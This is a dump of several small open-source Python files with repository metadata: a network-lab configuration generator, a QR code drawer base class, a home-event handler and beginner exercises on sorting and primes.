] | 2 | 2019-03-20T18:04:59.000Z | 2019-07-15T09:09:21.000Z | main.py | allgreed/pynetkit | 404142fbc21ae5b771f881d4b406fc53680b4e3b | [
"MIT"
] | null | null | null | main.py | allgreed/pynetkit | 404142fbc21ae5b771f881d4b406fc53680b4e3b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import re
import yaml
from collections import namedtuple, defaultdict
from ipaddress import IPv4Network
from itertools import repeat, combinations
from functools import update_wrapper
import click
BoundIface = namedtuple('BoundIface', 'host if_no')
NetedIface = namedtuple('NetedIface', 'host if_no ip netmask')
DomainAsoc = namedtuple('DomainAsoc', 'iface domain')
IFACE_STATEMENT_REGEXP = r'([a-z0-9_]+)\[(\d+)\]\s*=\s*"([A-Z])'
pass_data = click.make_pass_decorator(object)
@click.group()
@click.option(
"--labconf",
required=True,
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
help="Location of lab.conf",
)
@click.option(
"--netz",
required=True,
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
help="Location of netz.yml",
)
@click.pass_context
@click.command()
@pass_data
@click.command()
@pass_data
@click.command()
@pass_data
if __name__ == "__main__":
main()
| 26.978723 | 90 | 0.652471 | #!/usr/bin/env python3
import re
import yaml
from collections import namedtuple, defaultdict
from ipaddress import IPv4Network
from itertools import repeat, combinations
from functools import update_wrapper
import click
BoundIface = namedtuple('BoundIface', 'host if_no')
NetedIface = namedtuple('NetedIface', 'host if_no ip netmask')
DomainAsoc = namedtuple('DomainAsoc', 'iface domain')
IFACE_STATEMENT_REGEXP = r'([a-z0-9_]+)\[(\d+)\]\s*=\s*"([A-Z])'
def get_conf_contents(path="./lab.conf"):
with open(path) as f:
raw = f.readlines()
stripped = map(lambda l: l.rstrip("\n"), raw)
return filter(bool, stripped)
def parse_iface_statement(statement):
result = re.match(IFACE_STATEMENT_REGEXP, statement)
if result:
host, if_no, domain = result.groups()
return DomainAsoc(iface=BoundIface(host=host, if_no=if_no), domain=domain)
else:
raise ValueError("Not an interface statement")
def get_domain_subnets(path="./subnets.yml"):
return {k: IPv4Network(v) for k, v in yaml.safe_load(open(path)).items()}
pass_data = click.make_pass_decorator(object)
@click.group()
@click.option(
"--labconf",
required=True,
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
help="Location of lab.conf",
)
@click.option(
"--netz",
required=True,
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
help="Location of netz.yml",
)
@click.pass_context
def cli(ctx, labconf, netz):
domains = defaultdict(list)
subnets = get_domain_subnets(path=netz)
contents = get_conf_contents(path=labconf)
for statement in contents:
try:
dasc = parse_iface_statement(statement)
domains[dasc.domain].append(dasc.iface)
except ValueError:
continue
def net_domain(domain, bound_ifaces):
subnet = subnets[domain]
hosts = subnet.hosts()
return [NetedIface(*iface, next(hosts), subnet.netmask) for iface in bound_ifaces]
neted_domains = { k: net_domain(k, v) for k, v in domains.items() }
ctx.obj = neted_domains.values()
@click.command()
@pass_data
def ifup(data):
for domain in data:
for i in domain:
ifcmd_template = "ifconfig eth{ifno} {ip} netmask {netmask} up"
ifcmd = ifcmd_template.format(ifno=i.if_no, ip=i.ip, netmask=i.netmask)
cmd_template = "echo '{command}' >> {host}.startup"
cmd = cmd_template.format(command=ifcmd, host=i.host)
print(cmd)
@click.command()
@pass_data
def gateway_routes(data):
for domain in data:
router = next(i for i in domain if "r" in i.host)
default_route_cmd = "route add default gw %s" % router.ip
for i in domain:
if "pc" not in i.host:
continue
cmd_template = "echo '{command}' >> {host}.startup"
cmd = cmd_template.format(command=default_route_cmd, host=i.host)
print(cmd)
@click.command()
@pass_data
def check_all_connections(data):
neted_ifaces = [i for i in sum(data, [])]
pings_required = combinations(neted_ifaces, 2)
pings_by_host = defaultdict(list)
for ping in pings_required:
pings_by_host[ping[0].host].append(ping[1].ip)
for host, pings in pings_by_host.items():
for ping in pings:
ping_cmd_template = "ping {ip} -c 1 -W 1"
ping_cmd = ping_cmd_template.format(ip=ping)
cmd_template = "echo '{command}' >> _test/{host}.test"
cmd = cmd_template.format(command=ping_cmd, host=host)
print(cmd)
def main():
cli.add_command(ifup)
cli.add_command(gateway_routes, "gw")
cli.add_command(check_all_connections, "cta")
cli()
if __name__ == "__main__":
main()
| 2,642 | 0 | 180 |
374933fc53917d78ec37e81b2924dd9f94764c6b | 135 | py | Python | blobedit.py | HieuLsw/blobjob.editor | c33473ffb7836a70ba3a1b2a9dd9452a9d3a1b81 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | blobedit.py | HieuLsw/blobjob.editor | c33473ffb7836a70ba3a1b2a9dd9452a9d3a1b81 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | blobedit.py | HieuLsw/blobjob.editor | c33473ffb7836a70ba3a1b2a9dd9452a9d3a1b81 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | #! /usr/bin/env python
import sys
# preferrence for the included libs
sys.path.insert(0, 'libs')
from editor import main
main.main()
| 15 | 35 | 0.733333 | #! /usr/bin/env python
import sys
# preferrence for the included libs
sys.path.insert(0, 'libs')
from editor import main
main.main()
| 0 | 0 | 0 |
054db30675a5f4ea79156e97c0906b1d49520cbb | 1,158 | py | Python | qrcode/image/styles/moduledrawers/base.py | xamronpc/python-qrcode | 49060c484ce6def1adbc13e3b14e71dcef266eb2 | [
"BSD-3-Clause"
] | null | null | null | qrcode/image/styles/moduledrawers/base.py | xamronpc/python-qrcode | 49060c484ce6def1adbc13e3b14e71dcef266eb2 | [
"BSD-3-Clause"
] | null | null | null | qrcode/image/styles/moduledrawers/base.py | xamronpc/python-qrcode | 49060c484ce6def1adbc13e3b14e71dcef266eb2 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
import abc
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from qrcode.image.base import BaseImage
from qrcode.main import ActiveWithNeighbors
class QRModuleDrawer(abc.ABC):
"""
QRModuleDrawer exists to draw the modules of the QR Code onto images.
For this, technically all that is necessary is a ``drawrect(self, box,
is_active)`` function which takes in the box in which it is to draw,
whether or not the box is "active" (a module exists there). If
``needs_neighbors`` is set to True, then the method should also accept a
``neighbors`` kwarg (the neighboring pixels).
It is frequently necessary to also implement an "initialize" function to
set up values that only the containing Image class knows about.
For examples of what these look like, see doc/module_drawers.png
"""
needs_neighbors = False
@abc.abstractmethod
| 30.473684 | 83 | 0.707254 | from __future__ import absolute_import
import abc
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from qrcode.image.base import BaseImage
from qrcode.main import ActiveWithNeighbors
class QRModuleDrawer(abc.ABC):
"""
QRModuleDrawer exists to draw the modules of the QR Code onto images.
For this, technically all that is necessary is a ``drawrect(self, box,
is_active)`` function which takes in the box in which it is to draw,
whether or not the box is "active" (a module exists there). If
``needs_neighbors`` is set to True, then the method should also accept a
``neighbors`` kwarg (the neighboring pixels).
It is frequently necessary to also implement an "initialize" function to
set up values that only the containing Image class knows about.
For examples of what these look like, see doc/module_drawers.png
"""
needs_neighbors = False
def __init__(self, **kwargs):
pass
def initialize(self, img: "BaseImage") -> None:
self.img = img
@abc.abstractmethod
def drawrect(self, box, is_active: "Union[bool, ActiveWithNeighbors]") -> None:
...
| 140 | 0 | 80 |
f50f6421c88a6048b74f4b57e50eb679c1cc0e74 | 1,259 | py | Python | Fundamentos/Aula 17- Listas (parte 1)/exercicio80.py | andrecrocha/Fundamentos-Python | e18a187945c3478d3b37bb3f350d0ca72e5bcc7a | [
"MIT"
] | null | null | null | Fundamentos/Aula 17- Listas (parte 1)/exercicio80.py | andrecrocha/Fundamentos-Python | e18a187945c3478d3b37bb3f350d0ca72e5bcc7a | [
"MIT"
] | null | null | null | Fundamentos/Aula 17- Listas (parte 1)/exercicio80.py | andrecrocha/Fundamentos-Python | e18a187945c3478d3b37bb3f350d0ca72e5bcc7a | [
"MIT"
] | null | null | null | """Desafio 80. Ler cinco valores númericos e ir colocando eles na lista de modo ordenado sem usar o método sort"""
numeros = list()
for cont in range(0, 5):
num = int(input("Escreva um número: "))
if cont == 0:
numeros.append(num)
elif cont == 1:
if num >= numeros[0]:
numeros.append(num)
else:
numeros.insert(0, num)
elif cont == 2:
if num >= numeros[1]:
numeros.append(num)
elif num <= numeros[0]:
numeros.insert(0, num)
else:
numeros.insert(1, num)
elif cont == 3:
if num >= numeros[2]:
numeros.append(num)
elif num <= numeros[0]:
numeros.insert(0, num)
elif num > numeros[0] and num <= numeros[1]:
numeros.insert(1, num)
else:
numeros.insert(2, num)
elif cont == 4:
if num >= numeros[3]:
numeros.append(num)
elif num <= numeros[0]:
numeros.insert(0, num)
elif num > numeros[0] and num <= numeros[1]:
numeros.insert(1, num)
elif num > numeros[1] and num <= numeros[2]:
numeros.insert(2, num)
else:
numeros.insert(3, num)
print(numeros)
| 26.229167 | 114 | 0.513106 | """Desafio 80. Ler cinco valores númericos e ir colocando eles na lista de modo ordenado sem usar o método sort"""
numeros = list()
for cont in range(0, 5):
num = int(input("Escreva um número: "))
if cont == 0:
numeros.append(num)
elif cont == 1:
if num >= numeros[0]:
numeros.append(num)
else:
numeros.insert(0, num)
elif cont == 2:
if num >= numeros[1]:
numeros.append(num)
elif num <= numeros[0]:
numeros.insert(0, num)
else:
numeros.insert(1, num)
elif cont == 3:
if num >= numeros[2]:
numeros.append(num)
elif num <= numeros[0]:
numeros.insert(0, num)
elif num > numeros[0] and num <= numeros[1]:
numeros.insert(1, num)
else:
numeros.insert(2, num)
elif cont == 4:
if num >= numeros[3]:
numeros.append(num)
elif num <= numeros[0]:
numeros.insert(0, num)
elif num > numeros[0] and num <= numeros[1]:
numeros.insert(1, num)
elif num > numeros[1] and num <= numeros[2]:
numeros.insert(2, num)
else:
numeros.insert(3, num)
print(numeros)
| 0 | 0 | 0 |
55152ae4ed033b4f1f9ed1f8bf792107931a99b0 | 785 | py | Python | ws/handler/event/enum/sleepiness.py | fabaff/automate-ws | a9442f287692787e3f253e1ff23758bec8f3902e | [
"MIT"
] | null | null | null | ws/handler/event/enum/sleepiness.py | fabaff/automate-ws | a9442f287692787e3f253e1ff23758bec8f3902e | [
"MIT"
] | 1 | 2021-12-21T11:34:47.000Z | 2021-12-21T11:34:47.000Z | ws/handler/event/enum/sleepiness.py | fabaff/automate-ws | a9442f287692787e3f253e1ff23758bec8f3902e | [
"MIT"
] | 1 | 2021-12-21T10:10:13.000Z | 2021-12-21T10:10:13.000Z | import home
from ws.handler.event.enum import Handler as Parent
| 27.068966 | 53 | 0.598726 | import home
from ws.handler.event.enum import Handler as Parent
class Handler(Parent):
KLASS = home.event.sleepiness.Event
TEMPLATE = "event/enum.html"
LABEL = "User is"
def _get_str(self, e):
if e == home.event.sleepiness.Event.Asleep:
return "asleep"
elif e == home.event.sleepiness.Event.Awake:
return "awake"
elif e == home.event.sleepiness.Event.Sleepy:
return "sleepy"
return e
def get_icon(self, e):
if e == home.event.sleepiness.Event.Asleep:
return "fas fa-bed"
elif e == home.event.sleepiness.Event.Awake:
return "fas fa-business-time"
elif e == home.event.sleepiness.Event.Sleepy:
return "fas fa-couch"
return e
| 545 | 151 | 23 |
af0b6fe564278c898bbc8ad18ad8f8d7dcf8139c | 324 | py | Python | 7.py | Polar1ty/euler_problems | bc1cd917d95d1b63b80a0b182dbd5e9f90a95d90 | [
"MIT"
] | 2 | 2020-06-09T10:35:12.000Z | 2020-06-09T11:32:16.000Z | 7.py | Polar1ty/euler_problems | bc1cd917d95d1b63b80a0b182dbd5e9f90a95d90 | [
"MIT"
] | null | null | null | 7.py | Polar1ty/euler_problems | bc1cd917d95d1b63b80a0b182dbd5e9f90a95d90 | [
"MIT"
] | null | null | null | i = 3
shit_indicator = 0
simple_nums = [2]
while len(simple_nums) < 10001:
for k in range(2, i):
if i % k == 0:
shit_indicator = 1
break
if shit_indicator == 1:
pass
else:
simple_nums.append(i)
i += 1
shit_indicator = 0
print(simple_nums[-1]) | 21.6 | 32 | 0.518519 | i = 3
shit_indicator = 0
simple_nums = [2]
while len(simple_nums) < 10001:
for k in range(2, i):
if i % k == 0:
shit_indicator = 1
break
if shit_indicator == 1:
pass
else:
simple_nums.append(i)
i += 1
shit_indicator = 0
print(simple_nums[-1]) | 0 | 0 | 0 |